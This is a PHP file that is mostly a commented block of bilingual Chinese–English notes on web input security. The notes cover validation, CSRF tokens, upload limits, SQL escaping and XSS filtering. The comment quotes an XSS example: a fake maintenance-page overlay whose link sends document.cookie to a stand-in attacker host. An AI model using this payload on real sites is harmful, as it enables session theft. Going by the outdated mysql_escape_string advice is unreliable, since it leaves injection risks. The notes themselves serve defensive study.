<?php
date_default_timezone_set('Asia/Shanghai');
//echo  md5('aaaa');
/*

Never Trust User Input
用户输入检查永不遗漏
例：/category/3
校验3是整数  校验3的长度
<http://www.pookebook.com>
 Always check to make sure that any URLs or query消毒URLs or query strings
 especially
(for example, if /category/3 passes an ID of 3 to a database query).
you can make sure that last URL segment is an integer
and that it’s less than 7 digits long,

校验提交的表单元素
长度校验 + 类型校验  + 去除HTML标签
• Always sanitize each form element, including hidden elements. Don’t just do this
kind of thing on the front end, as it’s easy to spoof up a form and then post it to
your server. Check for field length and expected data types. Remove HTML tags.

只接受自己域名的表单提交
（服务端的token校验）
• It’s a good idea to accept form posts only from your own domain. You can easily
do this by creating a server-side token that you check on the form action side. If
the tokens match, then the POST data originated on your server.
允许上传文件时，严格校验文件类型及文件大小
• If you’re allowing users to upload files, severely limit file types and file sizes.
如果用输入的需要用来执行sql 严格执行 mysql_escape_string()
• If user input is being used to run queries (even if it’s a simple SELECT), sanitize
using mysql_escape_string() or something similar



Hello from sunny California!
<div style="position: absolute;
 top: 0px;
 left: 0px;
 background-color: white;
 color: black;
 width: 100%;
 height: 100%; ">
<h1>Sorry, we're carrying out maintenance right now.</h1>
<a href="#" onclick="javascript:window.location =➥
 'http://reallybadguys.net/cookies.php?cookie=' + document.cookie;">
 Click here to continue.
</a>


php防止XSS跨站脚本攻击的方法:是针对非法的HTML代码包括单双引号等，使用htmlspecialchars()函数 。
所有有打印的语句如echo，print等 在打印前都要使用htmlentities() 进行过滤，这样可以防止Xss，注意中文要写出htmlentities($name,ENT_NOQUOTES,GB2312) 。




*/
